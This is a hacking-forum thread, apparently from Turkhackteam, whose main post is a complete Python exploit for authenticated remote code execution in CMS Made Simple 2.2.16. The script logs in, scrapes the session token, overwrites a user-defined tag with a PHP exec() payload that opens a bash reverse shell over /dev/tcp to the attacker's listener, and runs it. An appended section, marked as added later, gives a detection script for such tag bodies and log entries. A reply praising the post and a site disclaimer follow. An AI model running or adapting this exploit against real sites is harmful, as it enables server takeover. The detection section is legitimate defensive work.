CMS Made Simple 2.2.16 "editusertag.php" - RCE (Authenticated) Zero-Day Exploit!

DeathWarrior01

Expert member
14 January 2021
CMS Made Simple 2.2.16 "editusertag.php" - Remote Code Execution (Authenticated) Zero-Day!
Python:
# Exploit Title: CMS Made Simple 2.2.16 - 'editusertag.php' Remote Code Execution (Authenticated) Zero-Day
# Date: 2022/04/14
# Exploit Author: TurkHackTeam | DeathWarrior01
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: https://s3.amazonaws.com/cmsms/downloads/14953/cmsms-2.2.16-install.zip
# Version: 2.2.16
# CVE: N/A

import re
import sys

from bs4 import BeautifulSoup
from requests import Session

try:
    # Remote
    rhost = str(sys.argv[1])
    rport = str(sys.argv[2])
    username = str(sys.argv[5])
    password = str(sys.argv[6])

    # Local: start a listener first, e.g. nc -lvnp <lport>
    lhost = str(sys.argv[3])
    lport = str(sys.argv[4])

    base_url = f"http://{rhost}:{rport}"
    login_url = f"{base_url}/admin/login.php"

    with Session() as ses:
        # Authenticate as an admin user; the Session object keeps the session cookie.
        ses.get(login_url)
        login_data = {"username": username, "password": password, "loginsubmit": "submit"}
        ses.post(login_url, data=login_data)

        # Every admin page embeds the per-session security token (__c) in its
        # stylesheet link (style.php?__c=<token>); parse it instead of relying on
        # fixed string offsets, which break as soon as the href changes.
        admin_page = ses.get(f"{base_url}/admin/index.php")
        bs_content = BeautifulSoup(admin_page.content, "html.parser")
        token = None
        for link in bs_content.find_all("link", {"rel": "stylesheet"}):
            match = re.search(r"__c=([^&\"'\s]+)", link.get("href", ""))
            if match:
                token = match.group(1)
                break
        if token is None:
            sys.exit("[-] No __c token on the admin page: login failed, check the credentials")
        print(f"[+] Logged in, session token: {token}")

        # Edit an existing user-defined tag (id 2 exists in a default install). Its
        # current name is read back so that only the PHP body gets replaced; pick
        # another id from Extensions > User Defined Tags if 2 is missing.
        udt_url = f"{base_url}/admin/editusertag.php?__c={token}&userplugin_id=2"
        udt_page = ses.get(udt_url)
        bs_udt = BeautifulSoup(udt_page.content, "html.parser")
        name_input = bs_udt.find("input", {"name": "userplugin_name"})
        if name_input is None:
            sys.exit("[-] userplugin_id=2 not found, choose another existing tag id")
        tag_name = name_input["value"]

        # A UDT body is PHP that CMSMS executes. This one spawns a reverse shell
        # (>& also sends stderr over the socket). "apply" saves the tag and "run"
        # executes it immediately, so the shell connects back without having to
        # render a page that uses the tag.
        payload = f"exec(\"/bin/bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'\");"
        exploit_form = {
            "__c": token,
            "userplugin_id": "2",
            "userplugin_name": tag_name,
            "code": payload,
            "description": "You are hacked :)",
            "run": "1",
            "apply": "1",
            "ajax": "1",
        }
        print(f"[+] Sending payload, check the listener on {lhost}:{lport}")
        # This request blocks for as long as the reverse shell stays open.
        ses.post(udt_url, data=exploit_form)
        print("Done :)")

except IndexError:
    print("""
        Usage:
        python exploit.py <rhost> <rport> <lhost> <lport> <username> <password>

        Start a listener first: nc -lvnp <lport>
    """)
 
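A defender-side check for the two traces this exploit leaves, added here as an example and not part of DeathWarrior01's post: the PHP stored in the user-defined tag (an exec() call wrapping a /dev/tcp/ reverse shell) and the POST to admin/editusertag.php that saves and runs it. The tag bodies and access-log lines below are constructed for this example; the admin directory is assumed to keep its default name /admin, the log is assumed to be in the common combined format, and the tag bodies are assumed to have been pulled from the CMSMS database by the reader.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample inputs (not taken from a real system).
# The first string mirrors the PHP body the exploit above writes into the tag.
EXPLOIT_UDT_CODE = "exec(\"/bin/bash -c 'bash -i > /dev/tcp/10.0.0.5/4444 0>&1'\");"
# A harmless tag body; "executes" in the comment must not trigger the exec check.
BENIGN_UDT_CODE = '// executes the copyright helper\nreturn "Copyright " . date("Y") . " Example Ltd";'

# PHP functions that hand a string to a shell or to the PHP interpreter.
# The name must be followed by "(" so that words such as "executes" do not match,
# and \b stops "exec" from matching inside "shell_exec" (listed separately).
SINK_RE = re.compile(
    r"\b(exec|shell_exec|system|passthru|popen|proc_open|pcntl_exec|eval|assert)\s*\(",
    re.IGNORECASE,
)
# Shell-level reverse-shell indicators, independent of which PHP function runs them.
SHELL_INDICATOR_RE = re.compile(r"/dev/tcp/|bash\s+-i|nc\s+-e|`[^`]+`")


def scan_udt_code(code: str) -> List[str]:
    """Return the suspicious PHP sinks and shell indicators found in one UDT body,
    in order of first appearance and without duplicates. An empty list is clean."""
    hits = [m.group(1).lower() for m in SINK_RE.finditer(code)]
    hits += [m.group(0).strip() for m in SHELL_INDICATOR_RE.finditer(code)]
    return list(dict.fromkeys(hits))  # dict keeps insertion order and drops repeats


# Combined-format access log lines, constructed for this example. The three
# requests from 10.0.0.5 are the ones the exploit above makes (token value
# replaced by the placeholder TOKEN).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [14/Apr/2022:10:02:11 +0000] "GET /admin/index.php HTTP/1.1" 200 18211 "-" "python-requests/2.27.1"',
    '10.0.0.5 - - [14/Apr/2022:10:02:12 +0000] "GET /admin/editusertag.php?__c=TOKEN&userplugin_id=2 HTTP/1.1" 200 9120 "-" "python-requests/2.27.1"',
    '10.0.0.5 - - [14/Apr/2022:10:02:12 +0000] "POST /admin/editusertag.php?__c=TOKEN&userplugin_id=2 HTTP/1.1" 200 312 "-" "python-requests/2.27.1"',
    '192.0.2.10 - - [14/Apr/2022:10:05:40 +0000] "GET /index.php?page=about HTTP/1.1" 200 4411 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Assumption: the admin directory keeps its default name. CMSMS lets you rename
# it at install time, in which case adjust this suffix.
UDT_EDITOR_PATH = "/admin/editusertag.php"


def find_udt_edit_requests(lines: List[str]) -> List[Dict[str, str]]:
    """Return every POST to the UDT editor (the request that saves the tag and,
    with run=1, executes it) together with the edited tag id from the query string.
    The POST body, where code=, apply= and run= travel, is not in the access log,
    so this only shows which tag was saved, from where and when; confirm the
    content with scan_udt_code() on that tag's stored body."""
    found = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "POST":
            continue  # opening the editor is a GET and is routine admin activity
        target = urlsplit(m.group("target"))
        if not target.path.endswith(UDT_EDITOR_PATH):
            continue
        qs = parse_qs(target.query)
        found.append({
            "ip": m.group("ip"),
            "time": m.group("time"),
            "userplugin_id": qs.get("userplugin_id", [""])[0],
            "status": m.group("status"),
            "user_agent": m.group("ua"),
        })
    return found


if __name__ == "__main__":
    print("exploit UDT:", scan_udt_code(EXPLOIT_UDT_CODE))
    print("benign UDT: ", scan_udt_code(BENIGN_UDT_CODE))
    for hit in find_udt_edit_requests(SAMPLE_ACCESS_LOG):
        print("UDT saved:", hit)
```

A legitimate admin saving a tag produces the same POST, so the log check is a triage list rather than an alert; the body scan is what separates a reverse shell from a copyright notice, and it has to be run against every tag, not just the id the exploit happens to use.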

ByFelez

Expert member
9 July 2013
Well done, hocam.

The Turkhackteam.org website is a "Hosting Provider" within the meaning of Article 2, paragraph 1, subparagraph (m) and Article 5 of Law No. 5651. Content is created entirely by users without prior approval. As a hosting provider, Turkhackteam.org is not obliged to check or investigate user-created content or unlawful sharing. Türkhackteam attack teams never carry out any harmful activity against Turkish sites. Türkhackteam is not responsible for individual hacking activities carried out by Türkhackteam members. If a hacking activity is carried out against your sites using the Türkhackteam name, identify the IP address that performed it from your site/server access logs and file a criminal complaint with the public prosecutor's office together with the other evidence.